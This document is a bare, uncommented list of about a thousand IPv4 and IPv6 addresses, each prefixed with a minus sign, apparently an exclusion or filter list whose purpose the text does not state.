-139.59.100.145 -178.238.233.135 -103.100.157.138 -151.80.68.235 -91.121.216.100 -185.65.120.139 -5.255.92.19 -103.205.2.100 -14.102.151.163 -107.179.95.115 -61.115.230.12 -52.54.208.61 -188.165.130.0 -49.212.164.79 -121.15.190.26 -104.245.102.32 -209.200.13.169 -89.251.176.213 -195.95.229.138 -124.243.223.40 -79.98.29.44 -37.59.225.247 -54.191.33.155 -172.98.194.242 -120.24.51.5 -108.61.196.83 -208.78.162.50 -23.238.166.154 -194.19.246.142 -184.172.108.212 -145.239.198.83 -47.90.100.231 -68.171.211.99 -85.222.229.54 -177.0.16.2 -139.5.108.123 -5.189.171.194 -78.152.158.158 -122.9.22.149 -134.119.135.205 -101.71.9.51 -49.212.212.141 -23.253.213.146 -192.241.177.213 -188.126.77.20 -81.211.19.46 -101.200.73.193 -216.237.119.194 -103.235.243.154 -114.141.111.201 -103.26.76.2 -31.220.56.24 -45.125.48.56 -103.247.191.132 -198.50.243.246 -128.199.153.7 -91.224.194.72 -107.178.147.74 -101.200.136.128 -207.148.67.89 -188.130.252.17 -104.247.202.7 -204.44.75.246 -72.251.202.117 -172.255.173.3 -162.213.31.249 -173.82.77.228 -182.16.24.126 -202.171.225.121 -162.252.82.123 -38.128.113.60 -115.28.169.208 -221.193.192.40 -188.95.113.190 -54.183.182.169 -45.35.102.150 -211.149.144.94 -188.164.192.139 -52.0.76.211 -31.220.55.115 -172.246.220.37 -142.91.232.93 -23.230.224.195 -5.145.175.122 -2a00:1158:400:407::4b3 -115.51.68.15 -172.107.147.19 -23.110.47.220 -107.187.41.89 -49.212.58.227 -203.175.160.123 -159.8.13.52 -23.225.0.115 -23.225.89.15 -120.24.89.10 -216.119.144.83 -120.78.160.110 -103.239.242.38 -52.200.165.104 -52.198.231.169 -184.73.191.60 -118.89.22.187 -69.87.197.167 -89.40.0.24 -198.199.89.118 -61.191.56.160 -104.152.192.31 -192.241.220.181 -23.91.120.73 -149.162.4.6 -198.176.55.14 -14.0.74.132 -172.246.220.206 -180.178.60.94 -119.42.148.236 -133.130.119.94 -5.79.76.116 -192.99.212.160 -23.250.28.22 -186.235.255.244 -109.236.88.178 -185.14.187.34 -194.165.33.41 -122.9.15.14 -217.30.184.125 -172.106.187.232 -5.178.109.177 -173.212.195.73 -222.165.224.163 -107.187.41.155 -45.32.103.7 -103.240.214.240 -185.129.249.219 -43.241.253.155 -103.235.234.218 -172.247.51.238 -45.35.102.149 -107.170.17.251 -38.123.253.98 -162.242.148.146 -103.193.242.42 -103.41.126.27 -128.199.79.200 -162.243.137.15 -112.124.38.1 -45.114.94.127 -107.190.235.67 -2a00:1158:400:407::4b5 -43.230.202.60 -120.132.66.43 -81.171.28.102 -104.239.163.198 -103.30.77.218 -173.239.30.173 -66.219.108.106 -123.207.96.231 -109.109.128.213 -160.16.239.149 -139.196.188.130 -104.203.82.167 -115.124.107.231 -115.125.176.158 -188.226.163.134 -72.52.136.13 -51.254.111.194 -81.4.123.176 -172.255.173.104 -123.56.252.79 -103.100.157.57 -153.120.7.26 -216.106.96.91 -103.205.1.104 -81.2.233.149 -103.250.94.236 -202.90.194.167 -119.29.238.64 -172.106.187.211 -151.80.221.41 -51.15.217.184 -31.28.25.105 -103.46.138.188 -120.26.45.209 -123.49.46.147 -139.162.8.25 -115.125.176.60 -37.139.1.134 -106.15.183.139 -101.200.191.55 -174.138.115.86 -60.166.131.201 -139.196.232.27 -172.85.98.245 -52.67.125.22 -119.10.26.247 -91.121.145.121 -142.91.95.184 -123.57.26.144 -115.159.188.86 -69.13.210.194 -172.246.220.3 -122.9.235.252 -142.4.107.219 -2001:978:9200:0:166:: -144.217.139.39 -62.138.143.128 -2a05:480:0:9895::2 -133.242.225.24 -23.238.145.114 -5.39.113.76 -176.28.2.6 -118.69.169.17 -169.53.147.101 -119.28.84.227 -216.224.117.97 -5.178.109.12 -188.132.215.235 -122.144.133.87 -112.103.200.196 -80.233.244.74 -67.225.249.26 -43.230.200.225 -103.240.215.86 -196.22.53.153 -91.229.23.80 -185.22.235.36 -45.77.155.69 -103.240.215.65 -52.59.169.50 -159.203.181.204 -222.95.248.26 -37.187.150.16 -150.95.205.184 -185.206.86.26 -172.246.196.74 -198.143.138.123 -81.93.77.246 -172.246.220.9 -183.61.83.180 -78.24.222.81 -121.127.232.15 -41.231.55.41 -219.136.255.163 -198.61.190.157 -119.119.79.208 -139.162.108.18 -199.101.134.199 -97.107.134.184 -64.120.123.154 -190.210.186.19 -103.240.213.96 -43.230.200.131 -75.126.68.162 -218.232.75.238 -142.91.95.115 -121.40.169.21 -14.116.189.63 -45.61.112.61 -64.22.68.207 -167.114.10.161 -116.68.203.164 -66.155.96.191 -115.29.189.239 -37.59.44.125 -211.149.221.141 -88.85.79.207 -153.126.129.90 -198.143.186.32 -45.117.83.33 -107.178.162.90 -156.235.171.47 -115.125.176.150 -198.27.77.234 -2a0a:7d80:1:9::98:9c -172.246.196.251 -144.168.74.132 -54.165.167.59 -108.175.145.241 -43.230.202.71 -108.161.133.165 -23.238.176.215 -104.207.50.119 -178.20.242.61 -178.33.101.101 -123.57.34.176 -192.254.198.214 -195.189.82.93 -50.116.61.199 -188.166.223.205 -125.212.224.97 -182.73.220.19 -87.98.234.135 -37.187.222.166 -124.158.10.63 -64.22.68.73 -104.250.135.11 -202.103.210.205 -133.130.108.249 -118.193.204.49 -153.120.83.11 -205.147.96.237 -104.236.66.213 -213.157.227.66 -91.221.206.235 -109.73.168.230 -46.4.195.26 -139.162.227.215 -103.195.100.130 -103.244.1.143 -119.29.230.21 -64.6.108.154 -198.16.75.5 -123.207.24.74 -119.23.104.97 -172.107.71.62 -115.125.176.136 -103.240.212.169 -103.89.136.50 -172.255.173.50 -43.229.38.17 -103.28.38.50 -47.90.40.251 -123.56.44.172 -172.255.159.236 -72.14.182.254 -107.187.41.29 -45.77.37.209 -120.55.88.223 -134.119.65.22 -101.231.79.74 -45.114.94.167 -23.110.56.106 -220.172.12.36 -46.166.142.36 -5.45.77.147 -101.200.41.191 -185.58.196.120 -107.163.113.29 -37.58.97.242 -108.61.44.91 -58.215.179.155 -172.107.64.37 -37.230.103.140 -121.199.39.113 -185.25.102.182 -121.42.55.223 -160.16.212.238 -78.129.146.52 -142.91.95.226 -46.243.200.37 -51.255.27.103 -74.205.223.139 -23.19.202.15 -118.89.23.166 -64.207.177.75 -185.66.173.226 -23.225.89.57 -149.202.143.191 -103.214.229.54 -174.138.169.29 -61.216.65.201 -142.4.107.69 -71.19.249.99 -115.125.176.164 -115.28.80.44 -47.74.2.133 -69.197.177.82 -153.126.138.38 -160.16.125.137 -2a0a:7d80:1:7::96:300 -199.167.129.44 -115.159.118.245 -103.205.3.87 -177.85.144.8 -123.207.75.24 -66.171.236.249 -123.56.149.237 -118.122.249.206 -43.230.200.41 -172.252.10.90 -178.62.183.238 -51.255.126.245 -184.107.181.235 -103.27.179.64 -104.207.50.97 -118.193.235.238 -95.173.178.178 -217.182.217.76 -104.207.50.98 -107.186.35.160 -186.1.181.110 -101.55.71.32 -66.70.176.67 -216.218.255.2 -60.12.150.168 -171.244.23.97 -112.126.76.140 -144.168.73.134 -5.178.109.183 -162.243.211.58 -2a0a:7d80:1:7::104:b5 -114.55.142.6 -49.212.23.141 -59.51.114.23 -47.92.121.234 -182.16.89.118 -138.197.102.29 -39.106.187.246 -112.74.112.233 -182.254.234.63 -162.144.61.4 -37.200.101.165 -116.62.101.221 -85.118.129.43 -185.85.73.254 -49.212.152.78 -107.163.113.202 -103.41.125.12 -107.179.102.207 -93.188.162.124 -216.106.96.88 -121.40.48.162 -91.93.57.163 -89.19.235.241 -172.107.75.225 -118.116.34.144 -141.138.206.21 -27.254.146.193 -51.254.238.7 -23.224.115.230 -43.230.202.134 -142.91.95.39 -45.55.57.233 -93.115.112.9 -43.230.200.139 -66.171.236.117 -120.31.69.194 -202.171.225.133 -121.201.97.113 -178.63.11.243 -174.137.149.217 -198.24.151.116 -160.16.234.17 -222.73.48.250 -42.102.145.43 -220.73.163.57 -103.205.3.99 -67.208.113.139 -115.125.176.157 -172.255.173.83 -173.193.49.66 -80.233.244.50 -218.251.112.129 -172.252.10.137 -45.32.148.141 -204.74.208.108 -121.41.32.77 -42.112.29.141 -212.68.57.16 -103.230.120.226 -103.53.198.135 -104.167.3.112 -182.92.128.54 -120.77.32.24 -5.135.112.235 -5.178.109.143 -103.205.0.125 -199.87.233.58 -107.165.201.218 -216.107.153.188 -119.139.32.31 -69.175.69.22 -221.228.214.32 -156.235.168.35 -91.123.196.17 -115.125.176.13 -149.56.165.162 -164.132.12.179 -87.118.109.211 -172.247.51.58 -128.199.105.148 -87.98.183.20 -45.42.94.163 -107.178.147.95 -142.44.201.220 -199.87.232.170 -142.91.241.82 -78.109.29.66 -192.241.179.169 -23.19.22.16 -195.130.212.89 -111.67.198.133 -120.76.112.184 -133.242.159.228 -177.124.64.228 -52.43.4.55 -165.16.79.122 -79.98.28.250 -107.163.113.213 -107.180.79.49 -46.105.110.134 -103.240.212.84 -172.246.220.174 -107.178.150.111 -222.186.30.92 -122.155.16.186 -37.187.148.216 -120.78.153.149 -37.34.52.74 -43.230.201.159 -5.178.109.167 -188.68.53.120 -123.57.253.140 -78.110.63.129 -195.238.176.22 -107.186.35.228 -103.1.209.122 -45.32.11.35 -23.225.0.107 -139.162.28.149 -183.60.203.156 -210.22.154.26 -149.56.117.195 -125.64.43.156 -80.73.133.245 -185.104.28.33 -113.56.21.137 -64.207.98.142 -84.21.31.222 -164.215.38.69 -85.254.126.100 -45.114.94.60 -222.233.54.24 -208.110.80.29 -182.92.80.106 -45.33.26.168 -91.230.243.10 -91.121.251.36 -83.132.194.186 -23.225.239.97 -192.121.0.180 -194.79.29.197 -64.37.54.150 -184.106.72.186 -173.212.245.117 -193.124.17.150 -103.37.233.215 -66.254.178.26 -192.99.216.199 -51.15.137.231 -116.236.150.238 -192.237.163.237 -45.79.177.236 -209.141.46.134 -188.68.44.235 -123.206.133.16 -14.102.147.89 -198.74.119.99 -113.10.169.70 -218.237.67.38 -162.223.94.205 -49.50.65.89 -194.19.246.121 -107.191.105.16 -164.132.63.70 -173.212.203.189 -103.48.30.223 -103.240.212.249 -67.229.73.90 -189.84.216.22 -104.232.102.158 -188.165.95.208 -221.221.145.205 -47.94.42.228 -62.4.4.19 -62.80.169.205 -103.194.169.74 -112.124.26.154 -42.121.5.26 -120.24.243.91 -198.210.44.63 -74.82.164.12 -162.243.112.11 -160.16.119.52 -162.243.79.168 -175.103.58.163 -78.142.19.30 -91.191.172.41 -103.27.207.106 -23.225.0.36 -91.210.191.104 -202.6.17.185 -172.104.72.69 -209.235.220.239 -107.172.27.125 -47.95.254.254 -172.104.41.152 -175.0.160.229 -43.230.202.52 -192.162.28.29 -192.158.13.195 -31.169.92.14 -119.23.75.97 -216.104.35.66 -121.232.202.13 -62.138.139.153 -5.45.73.109 -81.7.13.25 -103.100.157.55 -176.58.62.82 -199.182.171.199 -101.200.91.203 -172.107.75.232 -103.10.189.48 -103.200.118.225 -50.28.61.58 -104.245.102.67 -23.110.47.249 -101.254.182.65 -162.144.105.220 -210.59.244.160 -172.107.165.38 -140.116.249.205 -80.252.116.160 -116.255.174.127 -160.16.243.254 -155.133.195.86 -43.230.203.171 -46.255.106.177 -216.224.117.250 -172.87.197.214 -47.93.219.148 -212.68.57.181 -23.110.56.83 -217.61.128.214 -5.178.109.145 -192.102.6.176 -107.187.41.143 -103.29.214.249 -120.92.236.63 -120.26.92.227 -176.31.156.16 -153.120.50.202 -216.97.6.169 -47.97.20.121 -64.118.95.196 -204.44.79.58 -207.58.186.58 -172.104.225.240 -69.174.251.105 -133.242.180.167 -216.17.106.21 -174.137.161.81 -219.148.52.42 -51.254.32.37 -43.230.203.53 -23.20.51.60 -204.27.59.138 -200.165.48.180 -185.50.198.204 -68.169.51.173 -104.236.183.135 -172.102.197.178 -104.237.3.61 -213.152.198.43 -23.225.239.119 -202.65.154.197 -69.4.233.218 -122.224.233.53 -14.23.146.203 -61.244.187.9 -23.239.15.188 -195.245.112.9 -192.102.7.38 -188.210.222.18 -27.155.88.171 -185.149.101.70 -173.252.192.58 -118.25.23.124 -23.238.129.126 -45.42.94.160 -192.157.226.125 -160.16.72.183 -27.118.26.37 -185.5.44.22 -185.11.74.50 -47.92.75.49 -103.236.223.166 -198.11.212.229 -211.149.230.202 -185.21.100.190 -120.24.0.243 -43.230.200.223 -37.187.64.213 -167.114.77.212 -118.217.182.241 -172.246.196.213 -43.230.201.146 -153.122.23.202 -5.135.118.247 -111.17.202.140 -104.207.154.130 -192.169.173.247 -204.74.221.162 -64.22.68.223 -216.130.184.118 -115.125.176.153 -99.192.222.78 -103.240.214.137 -69.46.69.213 -218.32.216.168 -112.124.103.223 -104.202.185.90 -172.107.71.40 -173.252.200.246 -50.31.4.121 -176.221.75.135 -119.28.67.167 -117.78.35.110 -23.225.113.75 -23.110.61.77 -122.10.70.131 -43.224.33.195 -103.221.220.116 -198.235.132.67 -194.19.246.111 -153.126.176.240 -23.225.239.28 -46.105.188.85 -114.55.24.159 -5.178.109.240 -103.240.214.122 -202.6.17.177 -139.129.245.180 -104.130.220.100 -185.103.99.52 -114.242.74.19 -60.205.92.238 -43.230.201.57 -43.230.202.64 -43.230.201.254 -198.200.41.73 -106.75.213.84 -153.120.154.75 -87.252.5.57 -104.145.234.119 -104.224.198.167 -51.255.215.18 -160.16.227.43 -159.65.1.112 -69.30.55.77 -39.106.137.98 -205.251.138.122 -172.255.173.135 -111.231.114.141 -193.19.118.184 -5.135.58.107 -179.63.251.35 -2a03:b780:1:0:216:3eff:fe00:2cb -153.126.199.77 -144.217.214.213 -60.12.69.147 -62.63.190.55 -192.0.19.77 -111.64.89.228 -173.239.30.153 -45.114.94.36 -172.106.186.24 -155.94.69.216 -37.59.2.82 -103.240.213.125 -153.36.105.90 -112.82.144.219 -2001:470:1f0a:94c::2 -182.85.190.192 -104.250.127.97 -67.222.158.66 -79.125.125.121 -139.162.149.202 -211.149.152.148 -173.252.208.3 -192.102.6.237 -108.61.132.195 -80.231.171.107 -172.104.93.35 -210.59.244.15 -119.28.182.69 -194.135.95.79 -122.114.42.217 -45.77.36.41 -82.135.151.144 -202.181.236.12 -91.214.119.164 -112.124.39.105 -198.37.114.131 -52.63.36.53 -158.69.34.33 -188.93.23.93 -103.13.220.15 -45.32.111.205 -139.162.179.94 -184.164.139.25 -5.45.72.78 -133.242.7.150 -103.28.39.181 -92.146.130.177 -103.200.32.253 -104.202.185.203 -65.49.9.164 -192.210.193.100 -188.226.145.81 -27.254.152.84 -35.197.44.54 -209.126.96.150 -59.153.61.174 -182.23.20.130 -118.190.24.201 -180.179.52.102 -182.16.89.117 -199.127.224.41 -142.91.95.245 -120.27.151.59 -104.207.50.70 -210.155.149.133 -5.135.224.60 -206.190.153.77 -23.225.239.246 -31.179.223.52 -117.48.202.177 -210.14.71.119 -222.222.181.245 -115.146.123.104 -46.229.63.41 -69.61.125.10 -104.143.36.6 -103.195.240.6 -164.132.164.227 -49.212.156.221 -198.50.248.198 -150.95.141.2 -178.33.185.28 -91.192.110.55 -23.225.95.254 -185.106.23.12 -96.44.172.82 -210.86.231.47 -120.24.164.132 -64.22.68.38 -23.104.135.185 -47.88.157.124 -218.38.31.89 -93.115.31.101 -158.106.128.120 -193.169.178.22 -207.244.103.25 -147.75.81.5 -193.70.86.133 -43.230.201.154 -43.230.201.186 -177.84.139.17 -199.229.255.76 -141.138.195.254 -182.18.22.157 -178.62.188.63 -174.137.161.68 -202.111.185.188 -159.203.1.58 -193.0.61.219 -1.58.146.22 -192.146.137.161 -94.242.195.28 -178.208.78.184 -201.7.200.10 -185.27.134.166 -150.95.150.238 -181.210.31.5 -66.55.88.21 -87.106.57.177 -192.151.247.203 -120.77.45.145 -139.199.22.177 -107.180.77.212 -182.16.25.147 -119.23.47.61 -89.43.17.43 -172.255.173.117 -43.230.202.175 -162.209.10.199 -123.55.89.35 -89.219.25.43 -112.124.16.101 -114.55.239.13 -114.55.239.13 -91.236.24.28 -13.125.133.4 -37.59.76.118 -192.252.215.211 -182.163.97.130 -5.178.109.23 -94.75.198.110 -94.103.35.20 -43.230.203.47 -204.44.66.113 -158.69.36.20 -104.203.82.253 -185.193.112.228 -89.39.104.168 -43.230.202.8 -79.170.95.118 -114.55.118.187 -82.135.151.85 -122.9.18.141 -174.137.164.151 -103.74.121.196 -5.45.73.201 -103.240.212.125 -184.175.106.240 -171.244.8.194 -122.114.142.124 -31.169.73.4 -222.168.43.93 -47.93.48.135 -52.35.252.211 -45.33.2.74 -178.33.118.134 -96.44.169.221 -120.132.37.230 -185.49.22.11 -115.125.176.195 -173.236.50.116 -195.110.160.3 -116.255.191.19 -182.92.214.253 -91.142.212.37 -91.142.215.129 -104.202.185.72 -121.34.31.182 -155.254.18.252 -185.50.196.71 -58.118.26.185 -208.100.26.25 -122.9.235.220 -91.109.204.112 -172.246.220.110 -23.244.241.117 -80.72.42.50 -193.194.83.237 -198.24.151.115 -172.107.71.32 -43.230.201.63 -43.230.200.45 -91.191.157.4 -216.224.117.150 -59.106.181.62 -185.195.230.176 -120.77.217.103 -120.25.193.168 -91.146.103.247 -212.83.172.182 -216.70.87.90 -182.48.54.119 -173.239.30.149 -216.155.139.217 -94.101.81.148 -5.178.109.80 -138.68.5.63 -104.236.176.232 -50.22.189.44 -155.254.17.161 -107.178.162.119 -185.89.204.4 -185.60.135.198 -96.126.104.195 -179.189.39.85 -47.92.34.21 -160.16.243.133 -166.62.117.233 -59.106.217.244 -23.89.176.188 -222.72.132.13 -47.104.134.128 -61.177.172.218 -23.238.166.184 -172.246.220.23 -158.69.84.125 -217.23.13.148 -120.26.106.122 -43.230.200.242 -182.16.43.2 -92.43.117.201 -173.252.249.179 -185.191.228.141 -94.23.147.78 -45.76.147.130 -185.45.116.246 -139.224.206.205 -23.238.145.125 -84.19.175.150 -213.74.193.25 -81.7.65.105 -202.107.246.75 -45.76.191.183 -173.252.229.91 -144.217.12.225 -172.246.196.39 -37.139.27.245 -107.163.113.4 -62.217.127.158 -42.51.12.119 -125.212.212.17 -157.52.130.134 -103.254.180.95 -192.186.143.246 -194.247.13.139 -5.200.55.26 -69.197.177.227 -23.225.95.221 -194.28.175.89 -103.14.8.134 -182.254.222.247 -74.54.253.180 -123.57.81.166 -174.137.161.104 -5.35.246.66 -192.154.100.45 -109.232.224.23 -183.91.154.124 -93.115.31.57 -45.40.161.201 -166.62.74.199 -103.240.215.136 -216.224.117.249 -211.149.165.146 -111.230.153.81 -199.182.173.14 -45.126.210.157 -185.50.225.101 -47.100.54.194 -199.188.104.4 -172.247.51.192 -23.244.241.132 -45.35.251.41 -91.121.247.82 -5.145.175.104 -97.74.232.247 -72.52.197.80 -188.138.127.238 -52.76.130.43 -5.45.74.75 -89.40.116.177 -159.203.118.162 -202.157.177.38 -59.190.141.3 -64.62.236.148 -5.135.118.229 -104.243.46.210 -5.196.4.236 -41.208.71.144 -204.61.222.23 -120.26.78.51 -216.66.43.119 -173.239.40.12 -195.133.196.50 -150.95.183.65 -178.239.177.80 -58.181.146.233 -202.52.133.164 -188.213.48.68 -69.162.110.58 -204.236.163.94 -185.13.56.175 -192.241.119.67 -103.248.255.239 -23.225.0.64 -137.74.165.103 -120.24.240.24 -54.204.139.19 -45.77.59.230 -85.215.2.166 -131.161.123.166 -133.130.89.58 -108.61.149.22 -62.210.71.21 -198.50.142.173 -31.28.163.194 -67.225.161.9 -156.67.216.200 -173.193.126.44 -172.106.187.224 -185.10.17.199 -157.7.108.155 -23.88.82.132 -185.12.111.60 -104.202.185.186 -104.239.137.20 -160.16.197.82 -47.93.114.193 -197.81.131.102 -186.232.108.106 -174.142.158.149 -117.54.125.132 -162.242.148.5 -120.26.95.173 -37.187.236.142 -43.230.200.98 -38.83.104.238 -182.163.126.123 -202.105.232.12 -176.34.96.133 -185.100.111.227 -103.242.238.228 -50.23.188.52 -45.32.250.40 -5.135.52.214 -182.16.121.68 -203.124.47.153 -23.238.166.178 -172.107.71.12 -112.121.167.181 -123.57.32.159 -115.159.223.67 -46.183.123.78 -45.35.99.150 -39.108.157.34 -5.178.109.52 -2a01:d0:ffff:33::2 -211.149.210.254 -23.225.113.94 -178.32.124.27 -223.27.254.35 -107.170.18.119 -114.134.91.18 -172.106.187.250 -142.4.103.80 -52.192.11.73 -178.18.81.193 -133.242.140.96 -115.125.176.172 -147.175.115.30 -5.153.41.145 -108.61.178.235 -173.208.197.178 -112.124.125.115 -199.241.142.206 -62.63.190.56 -195.8.206.132 -103.17.118.230 -159.148.13.157 -61.19.246.170 -103.205.1.108 -101.37.35.89 -104.203.82.10 -182.16.97.172 -192.99.249.79 -123.57.157.78 -142.91.95.224 -162.243.170.224 -74.122.121.185 -193.53.4.238 -64.237.59.195 -198.24.170.59 -160.16.115.51 -207.244.97.191 -203.195.171.248 -104.250.132.213 -162.144.192.95 -45.63.42.0 -180.97.69.182 -178.218.223.39 -150.95.140.41 -194.19.246.122 -163.172.113.145 -172.106.187.203 -182.163.126.142 -157.7.170.79 -210.75.17.216 -118.190.68.69 -23.225.89.23 -216.224.164.98 -103.197.84.9 -202.85.213.49 -172.107.147.49 -121.40.158.146 -23.238.176.223 -106.14.197.204 -182.254.243.182 -183.247.219.43 -103.255.179.150 -208.92.165.59 -188.226.141.36 -45.77.32.245 -103.240.215.150 -173.236.115.16 -62.63.190.53 -114.215.255.225 -115.29.7.145 -160.16.68.14 -60.12.69.121 -213.79.2.11 -116.25.134.65 -153.126.217.73 -103.250.94.251 -211.20.179.180 -116.228.62.220 -119.254.90.50 -188.215.245.217 -103.100.157.49 -192.99.182.3 -63.142.251.153 -123.60.202.241 -208.43.235.116 -210.245.17.38 -185.4.48.23 -163.172.124.105 -104.236.1.92 -45.41.92.145 -94.23.196.17 -74.91.122.144 -182.163.126.221 -23.225.89.239 -59.151.12.67 -66.228.56.150 -183.60.41.178 -50.115.132.205 -185.216.140.27 -23.225.95.170 -58.218.211.38 -89.39.196.214 -118.31.77.79 -160.16.96.71 -50.115.131.95 -212.84.66.231 -187.17.123.195 -43.230.143.21 -50.62.170.133 -208.87.37.241 -36.110.56.131 -193.219.155.46 -27.254.146.122 -124.158.4.218 -112.74.134.240 -120.27.137.247 -95.67.11.162 -121.40.30.98 -50.97.214.94 -5.45.74.116 -185.50.199.198 -185.50.199.141 -150.95.148.225 -153.121.61.133 -185.50.196.251 -38.123.103.41 -104.232.75.167 -180.76.119.239 -54.246.247.189 -103.205.1.79 -160.16.234.232 -2a0a:7d80:1:7::96:25 -172.246.220.211 -23.225.95.126 -52.220.39.249 -182.163.126.199 -41.206.200.137 -104.207.50.103 -188.164.192.94 -98.124.176.206 -103.193.241.146 -120.76.212.53 -59.151.12.77 -162.208.11.72 -185.12.111.181 -69.65.49.223 -115.125.176.10 -123.56.124.98 -2001:4802:7805:104:be76:4eff:fe20:fd35 -103.239.242.23 -5.45.75.155 -45.125.236.90 -79.98.108.166 -23.225.239.67 -176.31.129.161 -185.150.191.21 -54.197.230.40 -37.46.135.116 -37.200.96.3 -104.202.185.158 -91.121.247.81 -91.230.194.87 -172.102.197.168 -139.129.236.21 -167.114.178.214 -104.193.109.148 -172.106.187.243 -166.62.81.124 -176.123.8.191 -202.6.17.145 -201.149.23.165 -195.8.206.150 -103.28.38.63 -5.39.15.221 -216.224.117.251 -217.11.251.211 -204.74.208.170 -158.69.181.155 -213.21.138.161 -103.1.237.58 -120.25.103.206 -94.23.116.122 -84.19.187.101 -119.29.225.220 -151.80.232.139 -172.106.186.3 -192.241.181.40 -2001:4801:7827:101:be76:4eff:fe10:3b84 -172.107.71.50 -137.74.144.232 -103.198.45.13 -40.125.173.177 -58.216.8.156 -120.76.158.182 -5.39.121.35 -210.209.85.52 -103.230.120.254 -121.43.228.50 -91.134.227.137 -27.254.146.13 -50.23.130.159 -209.51.207.229 -158.69.216.249 -218.93.207.207 -149.71.101.8 -71.19.249.118 -66.180.198.205 -118.178.24.108 -43.230.200.207 -116.213.204.23 -193.183.5.199 -69.30.217.92 -197.251.88.7 -144.217.40.76 -210.59.244.14 -94.130.237.218 -174.137.164.146 -91.239.233.123 -2001:4800:7817:103:be76:4eff:fe04:e3b7 -172.106.187.252 -114.215.27.221 -172.104.75.134 -107.163.113.237 -103.38.43.234 -172.255.173.24 -183.87.36.252 -198.50.156.233 -166.78.211.144 -142.91.241.93 -61.155.5.9 -139.59.253.112 -1.195.125.237 -172.246.220.73 -119.29.178.28 -195.97.57.22 -120.24.163.196 -119.28.56.12 -59.108.232.3 -89.232.78.27 -38.121.61.242 -194.135.89.55 -120.76.158.120 -121.199.27.138 -112.74.88.33 -123.57.41.235 -103.240.215.172 -45.55.31.237 -119.29.19.51 -174.139.69.135 -185.119.188.62 -121.41.101.136 -139.196.205.199 -5.254.106.240 -139.129.167.203 -139.196.226.177 -193.70.102.198 -216.106.96.75 -66.11.117.42 -23.225.113.86 -45.33.97.175 -108.179.219.188 -106.75.19.40 -128.1.182.40 -23.225.0.203 -43.230.200.120 -104.236.10.67 -124.232.133.72 -69.30.221.100 -23.230.224.133 -140.143.1.244 -128.199.132.28 -162.252.82.124 -37.252.96.66 -5.135.215.242 -91.142.223.133 -137.74.144.226 -185.149.101.53 -156.235.170.110 -58.119.86.220 -202.93.27.5 -115.68.89.43 -23.19.22.56 -23.224.115.240 -103.250.94.246 -103.240.214.128 -47.88.6.247 -5.178.109.57 -120.78.82.104 -104.207.44.117 -146.185.128.197 -50.2.191.188 -37.139.25.63 -107.158.255.218 -136.144.137.92 -43.230.203.27 -208.67.251.120 -50.23.152.163 -5.145.174.75 -139.129.209.44 -120.25.157.226 -187.63.160.17 -101.0.68.125 -23.95.80.50 -58.137.106.83 -5.189.145.148 -123.56.248.247 -172.102.197.175 -221.122.122.84 -101.64.233.161 -58.221.9.58 -189.50.145.8 -5.135.58.69 -125.6.166.121 -209.126.113.33 -54.157.9.181 -107.163.113.118 -103.12.51.45 -54.251.108.10 -192.249.87.70 -188.166.63.45 -107.181.251.143 -95.211.187.2 -119.127.10.220 -203.195.148.31 -198.74.98.235 -2a0a:7d80:1:7::93:5a -96.44.179.252 -192.163.247.224 -5.61.39.49 -104.131.212.18 -37.59.66.207 -164.132.63.69 -185.169.197.19 -74.206.182.175 -122.9.22.178 -43.224.34.180 -124.205.20.133 -185.25.102.180 -119.147.137.42 -38.128.113.94 -153.126.180.114 -136.243.238.77 -192.241.200.152 -183.181.172.253 -177.131.114.34 -61.91.6.233 -91.239.26.156 -115.125.176.100 -94.23.247.202 -114.248.202.81 -219.94.234.143 -31.14.18.83 -220.181.86.13 -122.9.29.229 -63.231.123.68 -86.104.177.75 -5.45.79.141 -101.200.187.67 -120.132.122.71 -116.255.157.43 -54.173.145.2 -23.230.19.127 -172.246.220.132 -134.119.23.51 -80.233.244.48 -103.240.213.201 -23.110.47.218 -107.163.113.73 -45.42.94.182 -119.47.90.106 -104.192.84.40 -168.235.85.44 -149.56.231.110 -151.80.78.127 -198.200.41.124 -156.237.178.145 -121.40.81.129 -174.36.98.36 -115.125.176.83 -103.218.3.159 -199.46.127.81 -122.194.229.123 -107.178.162.124 -188.125.160.66 -54.88.113.246 -106.15.45.78 -205.147.98.20 -54.247.128.70 -107.150.119.140 -177.131.28.53 -5.145.175.163 -91.241.67.252 -184.154.69.90 -51.15.59.226 -162.213.199.125 -67.229.58.231 -2a0a:7d80:1:9::99:1b5 -185.13.58.215 -46.4.17.123 -178.33.249.52 -221.12.66.46 -192.169.174.225 -218.106.246.35 -172.255.173.22 -104.223.47.231 -27.155.88.26 -142.91.241.123 -218.245.6.89 -134.213.214.251 -173.192.196.109 -84.19.163.31 -115.125.176.111 -113.200.77.138 -153.126.135.59 -158.69.141.210 -111.202.15.20 -119.38.132.201 -107.170.64.110 -91.102.224.86 -174.137.161.118 -69.64.35.3 -185.22.234.122 -185.104.152.174 -172.246.196.254 -188.165.187.56 -122.114.42.53 -131.161.122.218 -113.212.163.132 -78.140.183.186 -87.118.123.94 -67.55.68.116 -54.151.12.146 -185.69.152.149 -2600:3c02::f03c:91ff:fea8:aca0 -172.104.91.245 -74.206.240.20 -188.42.219.152 -37.59.133.142 -121.201.5.243 -192.210.233.54 -103.52.147.172 -43.230.200.110 -61.191.17.217 -107.178.149.86 -45.114.94.245 -91.123.196.123 -172.107.64.47 -216.224.117.73 -212.71.252.95 -128.199.225.17 -47.93.113.187 -181.215.128.188 -103.1.51.80 -206.123.115.154 -142.91.95.242 -172.246.196.119 -64.6.105.66 -204.93.61.58 -18.221.120.152 -69.42.94.59 -103.240.212.104 -190.112.223.13 -95.183.3.52 -185.183.160.102 -23.225.95.150 -212.227.95.11 -172.255.173.102 -173.214.110.233 -77.92.144.14 -45.76.158.74 -216.224.117.177 -66.199.234.242 -146.71.99.185 -180.76.187.254 -178.18.84.61 -98.126.17.77 -36.111.38.41 -52.5.207.184 -123.15.51.3 -164.132.63.220 -133.130.89.165 -185.25.204.214 -47.96.249.77 -141.0.173.102 -218.32.216.233 -46.166.161.155 -118.178.196.227 -94.237.64.78 -134.119.72.209 -94.74.71.54 -80.249.173.249 -23.225.0.245 -79.98.30.116 -218.205.197.39 -192.99.126.219 -175.148.121.70 -69.163.34.111 -150.95.180.184 -103.244.2.13 -195.201.84.108 -153.126.200.84 -23.104.135.242 -184.107.243.61 -188.240.3.104 -172.246.220.126 -173.212.252.234 -92.43.114.253 -104.200.16.62 -103.240.214.93 -178.32.226.93 -133.242.191.176 -104.202.185.249 -23.224.115.28 -107.178.149.126 -112.4.82.122 -178.33.203.126 -2a0a:7d80:1:7::96:1a -91.227.16.123 -23.110.61.103 -113.10.197.127 